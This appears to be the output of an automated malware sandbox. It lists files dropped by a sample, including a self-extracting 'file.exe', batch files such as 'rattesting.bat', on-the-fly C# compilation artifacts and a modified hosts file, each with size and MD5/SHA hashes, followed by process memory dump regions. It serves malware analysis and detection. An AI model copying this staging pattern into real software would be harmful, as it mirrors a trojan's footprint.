8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
9498323a125502243b8a02f96bd806a8

SHA1
ebd66275effb4ee7cb1017fbab2ffb47cb366205

SHA256
2e6ed7ff6d72e95eacae872466547d53d526224e65695989ea0d0ccadc7c15e5

SHA512
3df66f78d4a9aeb33017a84fb7a04ae09cca0fef0051fcbf46c38b73aa39607c5a5cf0b9da992db2d13f6110b95171ad38d796259e9e9585bd3c9daa6a14ca1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
21643a4d156ecab7dc5310237c59ea25

SHA1
a67c19d36b0206e248fe5cda1be83264c11868f5

SHA256
2683eb556df64c8cd20a74c4647843b44afbc53ec049f8512af5d2e456dc4780

SHA512
399a359683007c7da871fd5a4d491e49eed5a3112650b51bf51c5cb5a9889114d94b496241efc7b0a1586315188232839583ad5d022504f764eee1a73093a041

Download Submit
C:\Users\Admin\AppData\Local\Temp\0ont2pf5\0ont2pf5.dll

Filesize
4KB

MD5
3aba4b9ee0f7c99cab4b732c5a4db90b

SHA1
81bdb00292ec8b27b75eee61ff9039440b5f477d

SHA256
3b0735fcafb9e503047a35bd03c01696cd9ca9291c115f60bee7d7ea5544c071

SHA512
0265d00fa20e06e80f67335904ffe4292e54a811c2b0ed155d1c2aa8d09fc784e6e0063af33bfc47b23a2cd51026fb7e67ac6572c480b603314276cef4c3cbd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\QQeJSTlgFD\Display (1).png

Filesize
190KB

MD5
37ce32f6791ddd5b1cc055242f45ce3e

SHA1
620b26a950d1b29b9735bcff26fededdd4ab4942

SHA256
b8020dc1323de29066feb9906d8e5ebf7784624774976bc8dc0301ea3e4f96d4

SHA512
ddbec374967f910d51835ad661203345ed6c002599b4a899bbbc3f764da600b26f3e98fcd09f11726d3c862f5761ba4e072b155dd3731f21f33630355f64fff5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB1BC.tmp

Filesize
1KB

MD5
289809a78372cf19278ac2fc0765199b

SHA1
fb0f59dfedf2af330fc6af1bc85a1cb4b804c75d

SHA256
cdad91fa292a2b5d2740589e705fa170a4973ad3a8bb42e606042e158cb2117f

SHA512
de42ce787dad55136284f49ace726b9a56adafb8df8ebf66d100faa04e2e98be59df03a1b52ea7ac0b243c9ba1169749e2ff25dcd788f056088cec8e446ebf6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe

Filesize
9.5MB

MD5
6438446799310b2042bb01d7701a7e76

SHA1
a126ff0763a9313f128449502dfb5a2b6d3f2709

SHA256
23e31208d554db75d2d755a61da99037e357738bbfdb8d957dad391d2c1f38dd

SHA512
9a3b7980fcb4e6a9883722ca740a4891de9830d4ce241098d8279f5f6c07cf70fcaf5492d00213228e53d90d6f23f04923288521fbb15ce7b400eaabfc42769f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\helper (2) - Copy.bat

Filesize
20B

MD5
069145d73333ed9d219339186ed8ca33

SHA1
554c3c0dc21aa5c6ca597642f2c74ead40ad884d

SHA256
9e44ad759678d4ac99a43dee65ef90b356422f23f2262c0bfba8fe954c4bdc45

SHA512
98b4bd600d2404a379285f5971679b2510020ed6e4d466d1a4739e01119c7fc6d1573a9cf3d7391e69d4618f04fd5e48f9b0bc81f7980ba86524dfb869e27474

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\rattesting.bat

Filesize
672B

MD5
c328b8f4fb1cac09c058b8234731f27f

SHA1
ebb8c4b9511b9b1db84fc57ef7556c8361828196

SHA256
fa193e36179088f3e714f47e85b9d5fe6fb48e74cfb7910bb843a2fb8775fa73

SHA512
d0078ff0d2233ef7e4ee5bbf65ccb449a519e2fa637fc357447418467682ea61bd63969bff2d7ede388bb0423e8733364484f6449ab405c82aa17acc7f153d68

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gjj0v3v4.qgk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0ont2pf5\0ont2pf5.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0ont2pf5\0ont2pf5.cmdline

Filesize
607B

MD5
4da8991469c51fa2c34d425379bcda80

SHA1
a324bd7fbdabdb36d32f68d7ad8f2c1d5f4a1c69

SHA256
af5dad44027466af904dbfbad080daffbffdfc8e3debb3ab905eec32fb9797ef

SHA512
cc5e69e042684477d0dd3cdf20313b209ca34319040cf9ea61edad2c7ddfe8475dfebdf903fbbadde71c5ef94d83080741820701398d3b977ddc7d7a727ca111

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0ont2pf5\CSCB21CFF1AC74949EE8F51A2F3ABD35BA8.TMP

Filesize
652B

MD5
41ba3960a68c76883bb995fb583bfc3d

SHA1
2bed2595e7d310c7e3aebde65635d1e9036d878f

SHA256
ef1a5c7dfdea2589bb9ba5bb39a5ad7bf152880a84d4fece6d616f1c04c5269a

SHA512
a689b29c1bf469afb8749a57eb6c15e4616ae63521bcd58c8c06fd4e9add6c0305cb81396e7cd943365900e6e1482a0484244cc23c8c13aa598d616087daeb4d

Download Submit
memory/396-13-0x0000000005880000-0x00000000058A2000-memory.dmp

Filesize
136KB

Download
memory/396-25-0x0000000005B70000-0x0000000005EC4000-memory.dmp

Filesize
3.3MB

Download
memory/396-29-0x0000000006550000-0x000000000656A000-memory.dmp

Filesize
104KB

Download
memory/396-8-0x000000007259E000-0x000000007259F000-memory.dmp

Filesize
4KB

Download
memory/396-28-0x0000000007960000-0x0000000007FDA000-memory.dmp

Filesize
6.5MB

Download
memory/396-26-0x0000000006010000-0x000000000602E000-memory.dmp

Filesize
120KB

Download
memory/396-27-0x0000000006050000-0x000000000609C000-memory.dmp

Filesize
304KB

Download
memory/396-33-0x0000000072590000-0x0000000072D40000-memory.dmp

Filesize
7.7MB

Download
memory/396-20-0x0000000005A00000-0x0000000005A66000-memory.dmp

Filesize
408KB

Download
memory/396-14-0x0000000005920000-0x0000000005986000-memory.dmp

Filesize
408KB

Download
memory/396-12-0x0000000072590000-0x0000000072D40000-memory.dmp

Filesize
7.7MB

Download
memory/396-10-0x0000000072590000-0x0000000072D40000-memory.dmp

Filesize
7.7MB

Download
memory/396-11-0x0000000005220000-0x0000000005848000-memory.dmp

Filesize
6.2MB

Download
memory/396-9-0x0000000002A30000-0x0000000002A66000-memory.dmp

Filesize
216KB

Download
memory/2020-42-0x000002197F830000-0x000002197F852000-memory.dmp

Filesize
136KB

Download
memory/3604-95-0x000002EBCFD70000-0x000002EBCFD78000-memory.dmp

Filesize
32KB

Download